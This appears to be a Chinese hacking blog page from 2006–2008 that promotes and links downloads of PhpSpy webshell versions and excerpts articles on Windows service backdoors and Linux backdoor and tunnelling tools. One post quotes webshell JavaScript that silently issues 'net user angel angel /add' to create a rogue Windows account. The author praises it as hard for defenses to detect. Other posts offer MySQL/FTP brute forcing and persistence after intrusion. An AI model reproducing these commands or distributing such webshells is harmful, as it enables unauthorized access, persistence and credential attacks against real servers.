PhpSpy2008低调上市

amxku 发表于 2008-01-07, 20:51

angel说做人要低调点的。

更多请关注本www.4ngel.net

phpspy_2008.rar (18.89 K, 下载次数:399, 上传时间:2008-01-07 21:03)

PhpSpy2008

amxku 发表于 2007-12-21, 19:11

先看下angel忽悠我的部分源码

makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=net user angel angel /add');
makeRequest('<?=$self>','POST','action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');
</script>

太牛X了，还好我先看了下代码，呼呼。估计是跟黑锅学的，这Y的不学好。前几天测试的那个版本还有部分问题，这个版本，基本上是已经很完美了，在MYSQL管理方面是大大的强。

AJAX也比较强，今天才发现他在安全技术中的重要作用了。隐蔽性超级好。什么这主动那主动防御的，在AJAX面前就什么都不是了。

浅析Windows2000/XP服务与后门技术

amxku 发表于 2007-12-15, 13:54

一> 序言
windows下的服务程序都遵循服务控制管理器(SCM)的接口标准，它们会在登录系统时自动运行，甚至在没有用户登录系统的情况下也会正常执行，类似与UNIX系统中的守护进程(daemon)。它们大多是控制台程序，不过也有少数的GUI程序。本文所涉及到的服务程序仅限于windows2000/XP系统中的一般服务程序，不包含Windows9X。本文相关服务级后门程序和代码可以到我们的主页FZ5FZ下载。

二> Windows服务简介
服务控制管理器拥有一个在注册表中记录的数据库，包含了所有已安装的服务程序和设备驱动服务程序的相关信息。它允许系统管理员为每个服务自定义安全要求和控制访问权限。Windows服务包括四大部分：服务控制管理器(Service Control Manager)，服务控制程序(Service Control Program)，服务程序(Service Program)和服务配置程序(Service Configuration Program)。

» 阅读全文

Tags: 服务 , 系统安全 , 后门 , windows , 系统

发表在: 技术相关 1 条评论阅读 6566 次

phpSPY 2006 最终修改版

amxku 发表于 2007-03-29, 10:32

7J 刚发过来的

加了目录加包，MYSQL和FTP的暴力破解，MYSQL上传下载，ADODB等，更多的东东大家自己去体会吧！

shell.php (91.27 K, 下载次数:585, 上传时间:2007-03-29 10:32)

Tags: 后门 , phpspy , 工具

发表在: 杂七杂八 1 条评论阅读 6007 次

Linux下的后门和日志工具

amxku 发表于 2006-06-13, 19:16

　攻入linux系统后，很多入侵者往往就开始得意忘形了。这其中还有一个原因，就是技术性也要求更高了。下面，我们来看看一些常用的经典工具。

　　1、从这里延伸：后门和连接工具

　　（1）Httptunnel

　　Tunnel的意思是隧道，通常HTTPTunnel被称之为HTTP暗道，它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙，实际上，它是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。说得简单点，就是说在防火墙两边都设立一个转换程序，将原来需要发送或接受的数据包封装成 HTTP请求的格式骗过防火墙，所以它不需要别的代理服务器而直接穿透防火墙。

» 阅读全文